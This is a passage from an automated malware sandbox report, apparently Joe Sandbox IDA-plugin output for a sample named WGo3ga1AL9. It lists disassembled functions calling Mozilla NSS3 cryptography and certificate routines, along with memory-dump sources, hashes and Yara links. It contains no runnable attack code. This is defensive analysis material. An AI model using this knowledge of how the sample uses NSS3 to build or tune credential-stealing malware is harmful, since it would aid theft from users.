                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Error$memcpy$K11_Value
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2334702667-0
                                                                                                                                              • Opcode ID: f0a153afd7a44101691b5340850a7eece89e2edd6321e53b9750218fe1b836de
                                                                                                                                              • Instruction ID: 612ad1c0ab10f49a3171ad912c353824358415e5f528849cbf011c3a5228a950
                                                                                                                                              • Opcode Fuzzy Hash: f0a153afd7a44101691b5340850a7eece89e2edd6321e53b9750218fe1b836de
                                                                                                                                              • Instruction Fuzzy Hash: 61A1CE75A002189FDB24CF54CD84BEAB7B5EF49308F0481A9ED4967781E731AD86CFA1
                                                                                                                                              Function 6C76ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C76ED6B
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6C76EDCE
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,6C76B04F), ref: 6C76EE46
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C76EECA
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C76EEEA
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C76EEFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3768380896-0
                                                                                                                                              • Opcode ID: c2aae838d2e57ad6806fa7f11367389831c69114d41d99d9b53cc2274feb4f7b
                                                                                                                                              • Instruction ID: 2a09fee7a8641a387eede0ea3be741cac782104a2f5b89c0f544c63b77a4f710
                                                                                                                                              • Opcode Fuzzy Hash: c2aae838d2e57ad6806fa7f11367389831c69114d41d99d9b53cc2274feb4f7b
                                                                                                                                              • Instruction Fuzzy Hash: F4814CB5A002099FEB14CF56DE89BAB77F9AF88708F144438EC159BB51D731E814CBA1
                                                                                                                                              Function 6C76CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C76C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C76DAE2,?), ref: 6C76C6C2
                                                                                                                                              • PR_Now.NSS3 ref: 6C76CD35
                                                                                                                                                • Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
                                                                                                                                                • Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
                                                                                                                                                • Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED
                                                                                                                                                • Part of subcall function 6C756C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C701C6F,00000000,00000004,?,?), ref: 6C756C3F
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C76CD54
                                                                                                                                                • Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07
                                                                                                                                                • Part of subcall function 6C757260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C701CCC,00000000,00000000,?,?), ref: 6C75729F
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76CD9B
                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C76CE0B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C76CE2C
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C76CE40
                                                                                                                                                • Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
                                                                                                                                                • Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
                                                                                                                                                • Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D
                                                                                                                                                • Part of subcall function 6C76CEE0: PORT_ArenaMark_Util.NSS3(?,6C76CD93,?), ref: 6C76CEEE
                                                                                                                                                • Part of subcall function 6C76CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C76CD93,?), ref: 6C76CEFC
                                                                                                                                                • Part of subcall function 6C76CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C76CD93,?), ref: 6C76CF0B
                                                                                                                                                • Part of subcall function 6C76CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C76CD93,?), ref: 6C76CF1D
                                                                                                                                                • Part of subcall function 6C76CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF47
                                                                                                                                                • Part of subcall function 6C76CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF67
                                                                                                                                                • Part of subcall function 6C76CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C76CD93,?,?,?,?,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF78
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                              • Opcode ID: 6704c265e32e1de513f2f9e6e9e3993e834d7e9a6dd1ee0ecc1d4a1c4db11803
                                                                                                                                              • Instruction ID: db9edd704738a24de1a59480f6ecbafafb22c73816634de4a93cf58a8f18d85c
                                                                                                                                              • Opcode Fuzzy Hash: 6704c265e32e1de513f2f9e6e9e3993e834d7e9a6dd1ee0ecc1d4a1c4db11803
                                                                                                                                              • Instruction Fuzzy Hash: 5851B1B6A001019FEB10EF6ADE48BAA77F8AF48349F250534DC55A7F40EB31E904CB91
                                                                                                                                              Function 6C712E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C702D1A), ref: 6C712E7E
                                                                                                                                                • Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
                                                                                                                                                • Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
                                                                                                                                                • Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
                                                                                                                                                • Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825
                                                                                                                                              • PR_Now.NSS3 ref: 6C712EDF
                                                                                                                                              • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C712EE9
                                                                                                                                              • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C702D1A), ref: 6C712F01
                                                                                                                                              • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C702D1A), ref: 6C712F50
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C712F81
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 287051776-0
                                                                                                                                              • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                              • Instruction ID: 685fad8adbe857dfc608c1afa0aed88f9aa82085be9fecf74766d5605e54c072
                                                                                                                                              • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                              • Instruction Fuzzy Hash: 9B3134715091408BF710C665CE4CFAFB2ADEF82318F6C0A79D42997ED1EB31998AC711
                                                                                                                                              Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0041B69A
                                                                                                                                                • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                                                                                                                                • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                                                                                                                                • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                                                                                                                              • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                                                                                                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                                                                                                                                • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                                                                                                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                                                                                                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                              • Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                                                                                                                              • Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
                                                                                                                                              • Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                                                                                                                              • Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99
                                                                                                                                              Function 6C70AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C70AEB3
                                                                                                                                              • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C70AECA
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70AEDD
                                                                                                                                              • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C70AF02
                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C829500), ref: 6C70AF23
                                                                                                                                                • Part of subcall function 6C75F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C75F0C8
                                                                                                                                                • Part of subcall function 6C75F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C75F122
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C70AF37
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3714604333-0
                                                                                                                                              • Opcode ID: 765e1b80ab1e619169cddcaba6e6f95034f0ae8f2a180ee9a69a7f2464652634
                                                                                                                                              • Instruction ID: 45bc6ec29e98b54c1592418af65f074dc87b229dbe17fe395c27837308bece09
                                                                                                                                              • Opcode Fuzzy Hash: 765e1b80ab1e619169cddcaba6e6f95034f0ae8f2a180ee9a69a7f2464652634
                                                                                                                                              • Instruction Fuzzy Hash: 3C214CF2A05200ABEB108E188E05B9A77E4AF8573CF144324FC149B7D0E731E54587A7
                                                                                                                                              Function 6C78EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78EE85
                                                                                                                                              • realloc.MOZGLUE(20563F9C,?), ref: 6C78EEAE
                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C78EEC5
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • htonl.WSOCK32(?), ref: 6C78EEE3
                                                                                                                                              • htonl.WSOCK32(00000000,?), ref: 6C78EEED
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C78EF01
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1351805024-0
                                                                                                                                              • Opcode ID: 827c06f6142bb5753058e62d40e86bcfbbbc20eda6c82d5bd49c76047c76d307
                                                                                                                                              • Instruction ID: 0b4fa4d27b3dd2eacb37e896da3fa0fd9fdfca7d5634e2fe29a102ccb75ae591
                                                                                                                                              • Opcode Fuzzy Hash: 827c06f6142bb5753058e62d40e86bcfbbbc20eda6c82d5bd49c76047c76d307
                                                                                                                                              • Instruction Fuzzy Hash: 0B21E775A012199FDB109F28DD8879A77A8EF45358F148139ED099BA41D730EC14CBF2
                                                                                                                                              Function 6C73EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C73EE49
                                                                                                                                                • Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7
                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C73EE5C
                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C73EE77
                                                                                                                                              • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C73EE9D
                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C73EEB3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 886189093-0
                                                                                                                                              • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                              • Instruction ID: 3086a868d171cc1ad9b8b645f6a8b97d1f17debb2452f626c4027a4da019540c
                                                                                                                                              • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                              • Instruction Fuzzy Hash: 6121C6BAA402246BFB118A14DD89EAB77ACEB45708F040174FD089B342EB71DC1487E1
                                                                                                                                              Function 6C70BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,6C78DC29,?), ref: 6C70BE64
                                                                                                                                                • Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
                                                                                                                                                • Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
                                                                                                                                                • Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C78DC29,?), ref: 6C70BE78
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C78DC29,?), ref: 6C70BE96
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E
                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C78DC29,?), ref: 6C70BEBB
                                                                                                                                                • Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
                                                                                                                                                • Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,6C78DC29,?), ref: 6C70BEDF
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C78DC29,?), ref: 6C70BEF3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3111646008-0
                                                                                                                                              • Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                              • Instruction ID: 567c0d15a3e4fcb94b83bed94f6ebfb53dcbddf6302616e4ee2dd11dccf8aaea
                                                                                                                                              • Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
